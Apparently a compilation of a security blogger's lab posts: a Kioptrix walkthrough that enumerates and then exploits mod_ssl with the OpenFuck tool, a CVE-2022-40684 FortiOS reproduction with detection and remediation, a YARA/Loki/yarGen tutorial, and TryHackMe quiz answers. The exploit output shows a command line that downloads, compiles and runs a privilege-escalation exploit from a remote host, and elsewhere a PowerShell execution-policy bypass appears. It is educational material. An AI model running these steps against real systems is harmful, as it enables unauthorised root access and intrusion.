S-1-5-21-4157223341-3243572438-1405127623-508 KIOPTRIX\unix_group.2147483402 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-509 KIOPTRIX\unix_group.2147483402 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-510 KIOPTRIX\unix_group.2147483403 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-511 KIOPTRIX\unix_group.2147483403 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-512 KIOPTRIX\Domain Admins (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-513 KIOPTRIX\Domain Users (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-514 KIOPTRIX\Domain Guests (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-515 KIOPTRIX\unix_group.2147483405 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-516 KIOPTRIX\unix_group.2147483406 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-517 KIOPTRIX\unix_group.2147483406 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-518 KIOPTRIX\unix_group.2147483407 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-519 KIOPTRIX\unix_group.2147483407 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-520 KIOPTRIX\unix_group.2147483408 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-521 KIOPTRIX\unix_group.2147483408 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-522 KIOPTRIX\unix_group.2147483409 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-523 KIOPTRIX\unix_group.2147483409 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-524 KIOPTRIX\unix_group.2147483410 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-525 KIOPTRIX\unix_group.2147483410 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-526 KIOPTRIX\unix_group.2147483411 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-527 KIOPTRIX\unix_group.2147483411 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-528 KIOPTRIX\unix_group.2147483412 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-529 KIOPTRIX\unix_group.2147483412 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-530 KIOPTRIX\unix_group.2147483413 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-531 KIOPTRIX\unix_group.2147483413 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-532 KIOPTRIX\unix_group.2147483414 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-533 KIOPTRIX\unix_group.2147483414 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-534 KIOPTRIX\unix_group.2147483415 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-535 KIOPTRIX\unix_group.2147483415 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-536 KIOPTRIX\unix_group.2147483416 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-537 KIOPTRIX\unix_group.2147483416 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-538 KIOPTRIX\unix_group.2147483417 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-539 KIOPTRIX\unix_group.2147483417 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-540 KIOPTRIX\unix_group.2147483418 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-541 KIOPTRIX\unix_group.2147483418 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-542 KIOPTRIX\unix_group.2147483419 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-543 KIOPTRIX\unix_group.2147483419 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-544 KIOPTRIX\unix_group.2147483420 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-545 KIOPTRIX\unix_group.2147483420 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-546 KIOPTRIX\unix_group.2147483421 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-547 KIOPTRIX\unix_group.2147483421 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-548 KIOPTRIX\unix_group.2147483422 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-549 KIOPTRIX\unix_group.2147483422 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-550 KIOPTRIX\unix_group.2147483423 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1000 KIOPTRIX\root (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1001 KIOPTRIX\root (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1002 KIOPTRIX\bin (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1003 KIOPTRIX\bin (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1004 KIOPTRIX\daemon (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1005 KIOPTRIX\daemon (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1006 KIOPTRIX\adm (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1007 KIOPTRIX\sys (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1008 KIOPTRIX\lp (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1009 KIOPTRIX\adm (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1010 KIOPTRIX\sync (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1011 KIOPTRIX\tty (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1012 KIOPTRIX\shutdown (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1013 KIOPTRIX\disk (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1014 KIOPTRIX\halt (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1015 KIOPTRIX\lp (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1016 KIOPTRIX\mail (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1017 KIOPTRIX\mem (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1018 KIOPTRIX\news (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1019 KIOPTRIX\kmem (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1020 KIOPTRIX\uucp (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1021 KIOPTRIX\wheel (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1022 KIOPTRIX\operator (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1023 KIOPTRIX\unix_group.11 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1024 KIOPTRIX\games (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1025 KIOPTRIX\mail (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1026 KIOPTRIX\gopher (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1027 KIOPTRIX\news (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1028 KIOPTRIX\ftp (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1029 KIOPTRIX\uucp (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1030 KIOPTRIX\unix_user.15 (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1031 KIOPTRIX\man (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1032 KIOPTRIX\unix_user.16 (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1033 KIOPTRIX\unix_group.16 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1034 KIOPTRIX\unix_user.17 (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1035 KIOPTRIX\unix_group.17 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1036 KIOPTRIX\unix_user.18 (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1037 KIOPTRIX\unix_group.18 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1038 KIOPTRIX\unix_user.19 (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1039 KIOPTRIX\floppy (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1040 KIOPTRIX\unix_user.20 (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1041 KIOPTRIX\games (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1042 KIOPTRIX\unix_user.21 (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1043 KIOPTRIX\slocate (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1044 KIOPTRIX\unix_user.22 (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1045 KIOPTRIX\utmp (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1046 KIOPTRIX\squid (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1047 KIOPTRIX\squid (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1048 KIOPTRIX\unix_user.24 (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1049 KIOPTRIX\unix_group.24 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1050 KIOPTRIX\unix_user.25 (Local User)

 ============================================= 
|    Getting printer info for 10.10.10.131    |
 ============================================= 
No printers returned.


enum4linux complete on Tue Nov  1 23:44:39 2022

This might be interesting:

We can also use nbtscan against the Samba service:


Doing NBT name scan for addresses from 10.10.10.131

IP address       NetBIOS Name     Server    User             MAC address      
------------------------------------------------------------------------------
10.10.10.131     KIOPTRIX         <server>  KIOPTRIX         00:00:00:00:00:00

So far we have gathered basic information as follows:

  • IP: 10.10.10.131
  • Ports: 22, 80, 443, 139, 111
  • Apache version: 1.3.20
  • mod_ssl version: 2.8.4
  • OpenSSL version: 0.9.6b
  • HTTP methods: GET, HEAD, OPTIONS, TRACE
  • OS type: Red Hat
  • Kernel version: Linux 2.4.9 - 2.4.18

Exploitation

I will first dig deeper into the mod_ssl remote buffer overflow vulnerability, since it may yield a remote shell.

The related CVE number is CVE-2002-0082.

Google it:

Open the second one:

We use the above exploit script.

It couldn’t be compiled:

I found an updated one in the comments:

Try this one:

Compiled successfully.

Exploiting:


└─$ ./OpenFuck 0x6b 10.10.10.131 443 -c 40                                                   1 ⨯

*******************************************************************
* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena  irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Connection... 40 of 40
Establishing SSL connection
cipher: 0x4043808c   ciphers: 0x80f8068
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$ 
d.c; ./exploit; -kmod.c; gcc -o exploit ptrace-kmod.c -B /usr/bin; rm ptrace-kmo 
--23:42:55--  https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
           => `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:443... connected!

Unable to establish SSL connection.

Unable to establish SSL connection.
gcc: ptrace-kmod.c: No such file or directory
gcc: No input files
rm: cannot remove `ptrace-kmod.c': No such file or directory
bash: ./exploit: No such file or directory
bash-2.05$ 
bash-2.05$ whoami
whoami
apache

It appears that I’m not root.

What could go wrong?

When I checked the output again, I saw that during exploitation it tried to connect to the URL https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c but failed, and then tried to execute the script ./exploit, which could not be found.

So I think the URL is used to download that exploit, and that exploit is for privilege escalation.

To verify this, I checked the source code, and it contains the following lines:

After gaining access to the system, it downloads the source, compiles it and executes it.

I’m going to fix this exploit script. Here’s my plan: download the exploit file by hand and put it on the attacker VM (my Kali Linux); then, after running OpenFuck again, download it from Kali and execute it by hand on the target VM.

After getting a shell, download the exploit script from Kali:

Compiling:

Exploiting:

Nailed it! I’m root now.

We can also prettify the shell.

Google it:

Try python tty:

It doesn’t seem to work.

Try another one:

Ok, this is it.

Reproducing CVE-2022-40684

Overview

CVE-2022-40684 is a high-severity vulnerability recently disclosed by Fortinet.

An attacker can inject an SSH public key into a Fortinet device through the Fortinet API and make the device believe the key belongs to the admin account, thereby gaining administrator login access.

Affected versions

FortiOS versions 5.x, 6.x are NOT impacted.

FortiOS version 7.2.0 through 7.2.1

FortiOS version 7.0.0 through 7.0.6

FortiProxy version 7.2.0

FortiProxy version 7.0.0 through 7.0.6

FortiSwitchManager version 7.2.0

FortiSwitchManager version 7.0.0

Reproduction

Start the attack:

Attack screenshot

The SSH public key was successfully added to the firewall.

Log in with an SSH client, selecting the local private key as the login method:

Attack screenshot

Login succeeds without entering a password.

Checking whether the device has been compromised

Search the logs for: user="Local_Process_Access"
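The log search described above, as an added example that is not part of the original post: a Python script that parses FortiOS-style key="value" event log lines and flags configuration changes attributed to user="Local_Process_Access". The log lines are constructed samples, and the field names other than user (logdesc, ui, action, cfgpath, cfgobj, cfgattr, ssh-public-key1) are assumed to follow FortiOS's usual event log layout.

```python
import re
from typing import Dict, List

# FortiOS event logs are space-separated key=value pairs; values containing spaces
# are double-quoted. The regex captures either a quoted value (with \" escapes) or a
# bare token.
_KV_RE = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S+)')

# The indicator from the post: configuration changes logged under this pseudo-user
# instead of a real administrator account.
SUSPICIOUS_USER = "Local_Process_Access"

def parse_fortios_log(line: str) -> Dict[str, str]:
    """Parse one FortiOS log line into a dict, unquoting values."""
    fields = {}
    for key, value in _KV_RE.findall(line):
        if value.startswith('"') and value.endswith('"'):
            value = value[1:-1].replace('\\"', '"')
        fields[key] = value
    return fields

def is_suspicious(entry: Dict[str, str]) -> bool:
    """True when the change was attributed to Local_Process_Access."""
    return entry.get("user") == SUSPICIOUS_USER

def find_suspicious(lines: List[str]) -> List[Dict[str, str]]:
    """Return the parsed entries matching the indicator, in log order."""
    hits = []
    for line in lines:
        if line.strip():
            entry = parse_fortios_log(line)
            if is_suspicious(entry):
                hits.append(entry)
    return hits

def summarize(entry: Dict[str, str]) -> str:
    """One-line summary for an analyst: when, who, what changed and on which object."""
    return "{} {} user={} action={} path={} obj={} attr={}".format(
        entry.get("date", "?"), entry.get("time", "?"), entry.get("user", "?"),
        entry.get("action", "?"), entry.get("cfgpath", "?"), entry.get("cfgobj", "?"),
        entry.get("cfgattr", "?"))

# Constructed sample lines (not real device output). Field names beyond `user`
# are assumed from FortiOS's usual event log layout. Line 1: a normal admin change
# from the GUI. Line 2: the pattern the post says to search for, an SSH public key
# set on the admin account by Local_Process_Access. Line 3: the SSH login that follows.
SAMPLE_LOGS = [
    'date=2022-10-13 time=10:15:02 logid="0100044547" type="event" subtype="system" '
    'level="information" vd="root" logdesc="Object attribute configured" user="admin" '
    'ui="GUI(192.0.2.10)" action="Edit" cfgpath="system.global" cfgobj="" '
    'cfgattr="hostname[fw1->fw-edge]" msg="Edit system.global"',
    'date=2022-10-13 time=10:17:44 logid="0100044547" type="event" subtype="system" '
    'level="information" vd="root" logdesc="Object attribute configured" '
    'user="Local_Process_Access" ui="" action="Edit" cfgpath="system.admin" '
    'cfgobj="admin" cfgattr="ssh-public-key1[PLACEHOLDER-PUBLIC-KEY]" '
    'msg="Edit system.admin admin"',
    'date=2022-10-13 time=10:18:01 logid="0100032001" type="event" subtype="system" '
    'level="information" vd="root" logdesc="Admin login successful" user="admin" '
    'ui="ssh(203.0.113.5)" method="ssh" msg="Administrator admin logged in successfully"',
]

if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_LOGS):
        print("ALERT:", summarize(hit))
```

On a real device, feed it the exported event log instead of SAMPLE_LOGS; a hit on cfgpath system.admin with an ssh-public-key attribute is the change to investigate first.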

Remediation

Upgrade to the following versions:

Please upgrade to FortiOS version 7.2.2 or above

Please upgrade to FortiOS version 7.0.7 or above

Please upgrade to FortiProxy version 7.2.1 or above

Please upgrade to FortiProxy version 7.0.7 or above

Please upgrade to FortiSwitchManager version 7.2.1 or above

Please upgrade to FortiOS version 7.0.5 B8001 or above for FG6000F, 7000E/F series platforms

On affected firmware versions, even if the HTTP-related ports are exposed, an attacker can only inject an SSH key; logging in still requires a connection to the SSH port.

So as long as SSH is not exposed to the public Internet, you are safe for the time being; of course, it is best to upgrade to the versions recommended by the vendor.

References

Official advisory: https://www.fortiguard.com/psirt/FG-IR-22-377
Exploit script: https://github.com/horizon3ai/CVE-2022-40684

YARA-based malware analysis

Introduction to YARA

YARA is an open-source tool for detecting malware, developed by VirusTotal. It works by pattern matching: you write rule files containing concrete detection rules that describe features of the malware, such as strings, the malware’s SHA-256 hash, IOC domains/IPs, hex byte values and so on.

The malware analysis engines of almost all mainstream antivirus products worldwide integrate tools that support YARA, for example the well-known Trend Micro, VirusTotal, McAfee, Tenable, Cisco, Avast and Fortinet.

For the full list see: https://github.com/VirusTotal/yara

Writing rules with YARA alone, however, would be an enormous amount of work, so a number of YARA-based malware scanners have been derived from it. The most popular are Loki, Thor Lite and Thor. The first two are free and open source; the last is commercial. All of these tools are developed by Florian Roth, who also maintains a public YARA rule repository (and threat intelligence platform) called Valhalla, which can be used to search for YARA rules and threat intelligence about malware.

In addition, the yarGen tool can be used to generate custom YARA rules.

In short: YARA is the most basic unit, and a .yar file can contain all kinds of detection rules. Loki and Thor are malware scanners built on YARA with many built-in .yar files (containing a wide variety of rules). When you encounter a malicious file that is not covered by the rule base and need custom rules for that specific malware, yarGen can generate those rules automatically.

Here is another collection of YARA resources worth a look: GitHub - InQuest/awesome-yara: A curated list of awesome YARA rules, tools, and people.

Installation steps for all the tools are omitted; see their GitHub pages.

Creating YARA rules

YARA rule files end in .yar. Below is an example rule file:

yara_rule

  • rule is followed by the rule name
  • strings defines string variables; here the lowercase and uppercase forms of hello are defined
  • condition is the match condition; any of them means the rule fires (a detection) if any one of the strings above matches

For a detailed tutorial on YARA rule syntax see the official documentation: Writing YARA rules — yara 4.2.0 documentation

YARA scanning example

First create three files: test.yar is the YARA rule file, and the other two are plain text files containing Hello (capitalised first letter) and HELLO (all capitals) respectively.

The content of test.yar is as follows:

That is, only a match on Hello counts as a detection.

Let’s verify this in practice. The syntax of the yara command is:

yara <.yar rule file> <suspicious file to scan>

Run it twice in a row; the results are as follows:

As you can see, the first scan, of the all-capitals HELLO.txt, produced no output, meaning nothing was detected. The second output shows that the test_hello rule detected Hello.txt as the malicious file.
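To make the rule-structure bullets above and the Hello/HELLO scan result concrete, here is an added example that is not part of the original post and is not YARA itself: a small Python emulator for the subset of YARA used above (text strings, the `$id`, `any of them` and `all of them` conditions, plus YARA's real `nocase` modifier). The rule text and file contents are constructed to mirror the post's example rule, its test.yar and the two text files.

```python
import re
from collections import namedtuple
from typing import Dict, List

# Supported subset of YARA: `rule NAME { strings: ... condition: ... }` blocks with
# text strings (optionally marked `nocase`) and a condition that is a single `$id`,
# `any of them` or `all of them`.
_RULE_RE = re.compile(r"rule\s+(?P<name>\w+)\s*\{(?P<body>.*?)\}", re.S)
_STRING_RE = re.compile(r'\$(?P<id>\w+)\s*=\s*"(?P<text>[^"]*)"(?P<mods>(?:[ \t]+[a-z]+)*)')

# strings: [(id, text, nocase)]; condition: "any", "all" or a string id
Rule = namedtuple("Rule", "name strings condition")

def parse_rules(source: str) -> List[Rule]:
    """Parse rule text into Rule objects in file order (the order yara reports them)."""
    rules = []
    for m in _RULE_RE.finditer(source):
        body = m.group("body")
        strings_part = ""
        if "strings:" in body:
            strings_part = body.split("strings:", 1)[1].split("condition:", 1)[0]
        condition_part = body.split("condition:", 1)[1].strip()
        strings = []
        for s in _STRING_RE.finditer(strings_part):
            nocase = "nocase" in s.group("mods").split()
            strings.append((s.group("id"), s.group("text"), nocase))
        if condition_part == "any of them":
            condition = "any"
        elif condition_part == "all of them":
            condition = "all"
        elif condition_part.startswith("$"):
            condition = condition_part[1:]
        else:
            raise ValueError("unsupported condition: %r" % condition_part)
        rules.append(Rule(m.group("name"), strings, condition))
    return rules

def _string_matches(text: str, data: bytes, nocase: bool) -> bool:
    """Plain substring search; YARA text strings are case-sensitive unless `nocase`."""
    if nocase:
        return text.lower().encode() in data.lower()
    return text.encode() in data

def evaluate(rule: Rule, data: bytes) -> bool:
    """True when the rule's condition holds for the given file content."""
    hits = {sid: _string_matches(text, data, nocase) for sid, text, nocase in rule.strings}
    if rule.condition == "any":
        return any(hits.values())
    if rule.condition == "all":
        return all(hits.values())
    return hits.get(rule.condition, False)

def scan(rule_source: str, files: Dict[str, bytes]) -> Dict[str, List[str]]:
    """Return {filename: [names of matching rules]}, like running `yara rules.yar file`."""
    rules = parse_rules(rule_source)
    return {name: [r.name for r in rules if evaluate(r, data)] for name, data in files.items()}

# Constructed rules: hello_example mirrors the post's first rule (lowercase and
# uppercase hello, any of them); test_hello mirrors test.yar (only "Hello");
# hello_any_case uses the real YARA `nocase` modifier so every spelling matches.
RULES = '''
rule hello_example
{
    strings:
        $lower = "hello"
        $upper = "HELLO"
    condition:
        any of them
}
rule test_hello
{
    strings:
        $hello = "Hello"
    condition:
        $hello
}
rule hello_any_case
{
    strings:
        $a = "hello" nocase
    condition:
        any of them
}
'''

# Constructed file contents standing in for the text files from the post.
FILES = {"Hello.txt": b"Hello world\n", "HELLO.txt": b"HELLO WORLD\n", "hello.txt": b"hello there\n"}

if __name__ == "__main__":
    for fname, matched in scan(RULES, FILES).items():
        for rule_name in matched:
            print(rule_name, fname)   # same "rule file" layout as yara's own output
```

Running it shows why HELLO.txt produced no output against test.yar: the match is case-sensitive, and only a rule with `nocase` (or an explicit uppercase string, as in the post's first example) catches it.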

Loki scanning example

Loki has four main functions:

  • File name IOC check
  • YARA rule check
  • Hash check
  • C2 back-connect check

Loki download: Releases · Neo23x0/Loki · GitHub

The lab environment requires:

  • Python3
  • Yara
  • Loki
  • yarGen

You also need a malicious webshell file; here a PHP webshell named b374k is used, which you can find on GitHub yourself (downloading index.php is enough).

After installation, first run this command to update Loki’s YARA rule base:

python3 loki.py --update # after the update, a signature-base directory appears under the Loki installation path

Because of the network environment in China, the update will most likely fail. Here is an alternative.

Download the project https://github.com/Neo23x0/signature-base directly, extract it into Loki’s directory, and rename the extracted directory to signature-base.

There is only one command to run a scan:

python3 loki.py -p . # change to the directory containing the suspicious file and run the command; -p specifies the directory

Now scan the PHP webshell file:

The result shows ALERT, confirming it is malware. The screenshot lists the file’s hash, which detection rule it matched, and the detection result, detected.

Creating YARA rules with yarGen

Suppose you receive a phishing email carrying an .htm attachment suspected of being malware. Loki finds nothing abnormal, but when you analyse its source code you confirm that the .htm attachment is indeed malicious. What you need to do now is generate a new YARA rule file for this malicious file, and this is where yarGen comes in.

yarGen analyses the strings in the malicious file. It ships with a large string database holding a huge number of strings found in benign software; it compares these benign strings against the strings in the malicious file, removes the benign ones, and what remains are the suspicious strings, from which it generates new YARA detection rules.

As with Loki, update it before use:

python3 yarGen.py --update

Generate a new rule:

python3 yarGen.py -m /home/kali/suspicious-files/file2 --excludegood -o /home/kali/suspicious-files/file2.yar

Where:

  1. -m specifies the path where the malware is stored. Note that, in my testing, it is best to put only one malware sample in this directory; with several samples the generated rules can be very inaccurate.
  2. --excludegood removes harmless strings
  3. -o specifies the path where the rule file is saved

Screenshot of the actual run:

The generated rule can be run directly with yara:

yara new.yar malware

Alternatively, move the new rule file into signature-base/yara under the Loki program directory and run a scan with Loki.

In practice I sometimes encounter malicious files that antivirus does not detect (0-day malware, for example) but which I am confident are malicious from source analysis or other means. In those cases I use this custom rule generation method to update Loki’s YARA rules, so that any such file encountered later is automatically identified as malicious.

About Valhalla

The Valhalla platform is maintained by Florian Roth, the author of Loki and Thor. On the site you can search for a technique keyword to find the corresponding YARA rules, or look up the hash of a known piece of malware to retrieve the corresponding rule (if there is one).

Home page: https://valhalla.nextron-systems.com/

Searching for phishing, for example, returns rules related to phishing emails; each rule comes with a description and VirusTotal samples, and some are linked to the MITRE ATT&CK knowledge base.

Searching for a malware hash:

Also, if the platform returns a rule for a piece of malware but your local lab environment does not detect the malicious behaviour, your local rule base needs updating.

Nessus Room Writeup

TryHackMe: Nessus Room Writeup

Learn how to set up and use Nessus, a popular vulnerability scanner.

Task 3

What is the name of the button which is used to launch a scan?

New Scan

What side menu option allows us to create custom templates?

Policies

What menu allows us to change plugin properties such as hiding them or changing their severity?

Plugin Rules

In the ‘Scan Templates’ section after clicking on ‘New Scan’, what scan allows us to see simply what hosts are alive?

Host Discovery

One of the most useful scan types, which is considered to be ‘suitable for any host’?

Basic Network Scan

What scan allows you to ‘Authenticate to hosts and enumerate missing updates’?

Credentialed Patch Audit

What scan is specifically used for scanning Web Applications?

Web Application Tests

Task 4

Create a new ‘Basic Network Scan’ targeting the deployed VM. What option can we set under ‘BASIC’ (on the left) to set a time for this scan to run? This can be very useful when network congestion is an issue.

Schedule

Under ‘DISCOVERY’ (on the left) set the ‘Scan Type’ to cover ports 1-65535. What is this type called?

Port scan (all ports)

What ‘Scan Type’ can we change to under ‘ADVANCED’ for lower bandwidth connection?

Scan low bandwidth links

After the scan completes, which ‘Vulnerability’ in the ‘Port scanners’ family can we view the details of to see the open ports on this host?

Nessus SYN scanner

What Apache HTTP Server Version is reported by Nessus?

There might be some confusion here that I must mention. In the picture below the Apache version is 2.4.25, but that is not the correct answer. You need to wait until the scan finishes or the vulnerability named ‘Apache HTTP Server Version’ shows up in the panel. The true answer is below:

2.4.99

Task 5

What is the plugin id of the plugin that determines the HTTP server type and version?

10107

What authentication page is discovered by the scanner that transmits credentials in cleartext?

login.php

What is the file extension of the config backup?

To find the config backup you can look through the vulnerabilities that include information about URL paths, and then visit those paths to check whether any backup files are available.

But here there’s also a medium severity vulnerability showing up, so you can just open it and see the result:

.bak

Which directory contains example documents? (This will be in a php directory)

/external/phpids/0.6/docs/examples/

What vulnerability is this application susceptible to that is associated with X-Frame-Options?

Clickjacking

Active Directory Basics Room Writeup

TryHackMe: Active Directory Basics Room Writeup

Learn the basics of Active Directory and how it is used in the real world today

Task 2

What database does the AD DS contain?

NTDS.dit

Where is the NTDS.dit stored?

%SystemRoot%\NTDS

What type of machine can be a domain controller?

windows server

Task 3

What is the term for a hierarchy of domains in a network?

tree

What is the term for the rules for object creation?

Domain Schema

What is the term for containers for groups, computers, users, printers, and other OUs?

Organization Units

Task 4

Which type of groups specify user permissions?

Security Groups

Which group contains all workstations and servers joined to the domain?

Domain Computers

Which group can publish certificates to the directory?

Cert Publishers

Which user can make changes to a local machine but not to a domain controller?

Local Administrators

Which group has their passwords replicated to read-only domain controllers?

Allowed RODC Password Replication Group

Task 5

What type of trust flows from a trusting domain to a trusted domain?

Directional

What type of trusts expands to include other trusted domains?

Transitive

Task 6

What type of authentication uses tickets?

Kerberos

What domain service can create, validate, and revoke public key certificates?

Certificate Services

Task 7

What is the Azure AD equivalent of LDAP?

Rest APIs

What is the Azure AD equivalent of Domains and Forests?

Tenants

What is the Windows Server AD equivalent of Guests?

Trusts

Task 8

Before we dive into the answers, we need to set up PowerView first. PowerView is a PowerShell tool for gathering network information on Windows domains.

cd Downloads
powershell -ep bypass  # Use 'powershell -ep bypass' to open a powershell shell without being checked by the execution policy.
. .\PowerView.ps1  # Import PowerView script

Check the PowerView cheatsheet here.

What is the name of the Windows 10 operating system?

Windows 10 Enterprise Evaluation

What is the second “Admin” name?

Admin2

Which group has a capital “V” in the group name?

You can use the help to see examples for a specific command:

In the picture above:

  1. where-object is a filter
  2. -cmatch is followed by a case-sensitive regex

Hyper-V Administrators

When was the password last set for the SQLService user?

5/13/2020 8:26:58

Windows Fundamentals 1 Room Writeup

TryHackMe: Windows Fundamentals 1 Room Writeup

In part 1 of the Windows Fundamentals module, we’ll start our journey learning about the Windows desktop, the NTFS file system, UAC, the Control Panel, and more..

Task 2

What encryption can you enable on Pro that you can’t enable in Home?

BitLocker

Task 3

Which selection will hide/disable the Search box?

Hidden

Which selection will hide/disable the Task View button?

show task view button

Besides Clock and Network, what other icon is visible in the Notification Area?

In the bottom right-hand corner, right-click the icon and you can see “Open Action Center”.

action center

Task 4

What is the meaning of NTFS?

New Technology File System

Task 5

What is the system variable for the Windows folder?

%windir%

Task 6

What is the name of the other user account?

Type ‘lusrmgr.msc’ to see local users:

tryhackmebilly

What groups is this user a member of?

Check its properties:

Remote Desktop Users,Users

What built-in account is for guest access to the computer?

Guest

What is the account status?

Check its properties and you can tell the account is disabled:

account is disabled

Task 7

What does UAC mean?

User Account Control

Task 8

In the Control Panel, change the view to Small icons. What is the last setting in the Control Panel view?

windows defender firewall

Task 9

What is the keyboard shortcut to open Task Manager?

Ctrl+Shift+Esc

Wireshark 101 Room Writeup

TryHackMe: Wireshark 101 Room Writeup

Learn the basics of Wireshark and how to analyze various protocols and PCAPs

Task 7

What is the Opcode for Packet 6?

request(1)

What is the source MAC Address of Packet 19?

80:fb:06:f0:45:d7

What 4 packets are Reply packets?

use this display filter:

arp.opcode == 2

and the result is here:

76,400,459,520

What IP Address is at 80:fb:06:f0:45:d7?

Below you can see the MAC address is paired with IP 10.251.23.1:

10.251.23.1

Task 8

What is the type for packet 4?

8

What is the type for packet 5?

0

What is the timestamp for packet 12, only including month day and year?

note: Wireshark bases its time off of your device’s time zone; if your answer is wrong try one day more or less.

In the picture above you can see that the timestamp is May 31, 2013, but that is based on my time zone, which is China’s. So the answer may be shifted one day back or forth.

May 30, 2013

What is the full data string for packet 18?

Unfold the data panel and copy the value:

08090a0b0c0d0e0f101112131415161718191a1b1c1d1e1f202122232425262728292a2b2c2d2e2f3031323334353637

Task 10

What is being queried in packet 1?

Copy and paste the query value:

8.8.8.8.in-addr.arpa

What site is being queried in packet 26?

www.wireshark.org

What is the Transaction ID for packet 26?

The Transaction ID is an identifier chosen by the client when it sends a query to the server; the server then responds with the same ID.

0x2c58

Task 11

What percent of packets originate from Domain Name System?

Go to Statistics - Protocol Hierarchy:

4.7

What endpoint ends in .237?

Go to Statistics - Endpoints:

145.254.160.237

